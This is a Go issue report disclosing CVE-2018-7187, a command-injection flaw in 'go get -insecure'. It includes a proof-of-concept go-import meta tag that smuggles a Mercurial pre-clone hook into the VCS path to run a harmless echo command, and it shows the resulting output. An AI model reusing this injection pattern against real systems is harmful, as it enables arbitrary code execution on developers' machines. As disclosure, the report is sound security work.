cmd/go: arbitrary command execution via VCS path #23867
Description
I contacted security@golang.org about this and was allowed to create a public issue.
This has been assigned CVE-2018-7187.
What version of Go are you using (go version)?
go version go1.9.4 linux/amd64 (earlier versions are also affected)
Does this issue reproduce with the latest release?
Yes.
What did you do?
The go get implementation, when the -insecure command-line option is used, does not validate the import path, which allows remote attackers to execute arbitrary OS commands via a crafted website.
For example, this command should execute echo hello $USER:
go get -insecure khashaev.ru/go-vuln
See https://khashaev.ru/go-vuln/index.html:
<meta name="go-import" content="khashaev.ru/go-vuln hg --config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null">The proof of concept presented above is targeting Mercurial.
What did you expect to see?
package khashaev.ru/go-vuln: unrecognized import path "khashaev.ru/go-vuln"
What did you see instead?
hello inviz
abort: repository /home/inviz/go/src/khashaev.ru/go-vuln not found!
package khashaev.ru/go-vuln: exit status 255